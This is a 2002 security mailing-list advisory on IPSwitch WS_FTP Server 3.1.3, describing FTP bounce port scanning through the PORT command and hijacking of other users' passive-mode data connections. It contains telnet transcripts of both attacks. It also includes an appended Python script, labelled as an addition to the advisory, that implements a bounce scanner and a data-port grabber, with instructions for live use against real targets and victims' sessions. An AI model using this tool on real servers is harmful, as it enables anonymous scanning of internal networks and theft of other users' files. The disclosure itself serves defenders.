[NT] IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan

From: support@securiteam.com
To: list@securiteam.com
Date: 25 Oct 2002 17:07:50 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  IPSwitch WS_FTP Server PASV Session Hijacking and PASV Port Scan
------------------------------------------------------------------------

SUMMARY

IPSwitch's WS_FTP Server allows a remote attacker to do two things: bounce
connections (and therefore port scans) through the FTP server by way of the
PORT command, and hijack the passive-mode data connections of other users'
FTP sessions.

DETAILS

Vulnerable systems:
 * IPSwitch WS_FTP Server version 3.1.3 (the banner below reads 3.1.3.EVAL)

Impact:
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater
than 1024. Thus, the attacker can scan Internet addresses anonymously
along with any internal addresses that the FTP server has access to. More
information on this vulnerability can be found here:
http://www.cert.org/advisories/CA-1997-27.html

The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file
uploads may also be spoofed. No authentication is necessary to execute
this attack. More information on this vulnerability can be found here:
http://www.kb.cert.org/vuls/id/2558

Details:
This demonstrates the FTP bounce vulnerability. The PORT argument encodes
the address as h1,h2,h3,h4,p1,p2 with port = p1*256 + p2, so "31,144" is
port 8080. The server accepts a PORT address that is not the client's own,
and the reply to the following LIST is the oracle: a 150/226 pair means the
server reached the target, a 425 means it could not. Here the internal
address "192.168.1.20" is listening on port 8080, and "192.168.2.30" is
dead or not accessible via port 8080:

$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.

This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing

The 227 reply announces the data port, 4*256 + 23 = 1047. The server hands
the listing to whoever connects to that port first, without checking that
the peer is the client holding the control connection. Next, from another
IP address:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
-rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.
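The two manual exchanges above (the bounce scan and the PASV hijack), as an added example in Python that is not part of the advisory. The canned replies in ScriptedControl are constructed from the advisory's own transcript so the script runs offline; FtpControl is the only part that touches the network, and the hostnames, credentials and targets are placeholders to be replaced for real use.

```python
"""FTP bounce scan and PASV data-port hijack, after the advisory's transcripts.
Added example; hosts, credentials and the replayed replies are constructed."""
import io
import re
import socket

PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")


def port_arg(ip, port):
    """Encode ip:port as the PORT argument h1,h2,h3,h4,p1,p2 (RFC 959).
    192.168.1.20:8080 -> '192,168,1,20,31,144' since 8080 = 31*256 + 144."""
    if not 0 < port < 65536:
        raise ValueError("port out of range: %r" % port)
    return "%s,%d,%d" % (ip.replace(".", ","), port >> 8, port & 0xFF)


def parse_pasv(reply):
    """Return the (ip, port) announced by a 227 reply, or None otherwise."""
    m = PASV_RE.search(reply) if reply.startswith("227") else None
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


def read_reply(f):
    """Read one FTP reply from a binary file-like and return its final line.
    Multi-line replies open with 'ddd-' and close with a 'ddd ' line."""
    line = f.readline().decode("latin-1")
    if len(line) > 3 and line[3] == "-":
        code = line[:3]
        while line and not (line.startswith(code) and line[3:4] == " "):
            line = f.readline().decode("latin-1")
    return line.rstrip("\r\n")


def parse_reply_bytes(data):
    """read_reply over an in-memory transcript (offline check helper)."""
    return read_reply(io.BytesIO(data))


class FtpControl:
    """Minimal FTP control connection over a real socket."""
    def __init__(self, host, port=21, timeout=10):
        self.sock = socket.create_connection((host, port), timeout)
        self.f = self.sock.makefile("rb")
        self.banner = read_reply(self.f)

    def cmd(self, s):
        self.sock.sendall((s + "\r\n").encode("latin-1"))
        return read_reply(self.f)

    def read_reply(self):
        return read_reply(self.f)


class ScriptedControl:
    """Replays a constructed list of replies in order; no network at all."""
    def __init__(self, replies):
        self.replies, self.sent = list(replies), []

    def cmd(self, s):
        self.sent.append(s)
        return self.replies.pop(0)

    def read_reply(self):
        return self.replies.pop(0)


def login(ctrl, user, password):
    if not ctrl.cmd("USER " + user).startswith(("331", "230")):
        raise RuntimeError("USER rejected")
    if not ctrl.cmd("PASS " + password).startswith("230"):
        raise RuntimeError("login failed")


def bounce_scan(ctrl, targets):
    """Make the server connect to each (ip, port) for us. On LIST, 150 then
    226 means the server reached the target ('open'); 425 means it did not
    ('closed'). The target only ever sees the FTP server's address."""
    states = {}
    for ip, port in targets:
        if not ctrl.cmd("PORT " + port_arg(ip, port)).startswith("200"):
            states[(ip, port)] = "rejected"  # server refuses third-party PORT
            continue
        reply = ctrl.cmd("LIST")
        if reply.startswith(("150", "125")):
            ctrl.read_reply()                 # consume the trailing 226/426
            states[(ip, port)] = "open"
        elif reply.startswith("425"):
            states[(ip, port)] = "closed"
        else:
            states[(ip, port)] = "unknown " + reply[:3]
    return states


def pasv_data_port(ctrl):
    """Learn the passive data port a session was given. Whoever connects to it
    before the real client receives the listing or file that follows."""
    return parse_pasv(ctrl.cmd("PASV"))


def grab_data(host, port, timeout=10):
    """From a second host: connect to the data port and read until close."""
    with socket.create_connection((host, port), timeout) as s:
        chunks = []
        while True:
            d = s.recv(4096)
            if not d:
                return b"".join(chunks)
            chunks.append(d)


# Offline replay of the advisory's bounce session (constructed transcript).
BOUNCE_REPLIES = [
    "331 Password required", "230 user logged in",
    "200 command successful",
    "150 Opening ASCII data connection for directory listing",
    "226 transfer complete",
    "200 command successful",
    "425 Can't open data connection.",
]


def demo_bounce():
    ctrl = ScriptedControl(BOUNCE_REPLIES)
    login(ctrl, "lowhalo", "el_ach")
    return bounce_scan(ctrl, [("192.168.1.20", 8080), ("192.168.2.30", 8080)])
```

For live use, replace ScriptedControl with FtpControl("x.ternal.ip.address"), log in, and call bounce_scan with your own targets; for the hijack, call pasv_data_port on the victim's session (or watch the 227 on the wire) and run grab_data from another machine against the server's public address, not the address in the 227 reply, which here is a private one.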

ADDITIONAL INFORMATION

The information has been provided by low halo <mailto:lowhalo@hushmail.com>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
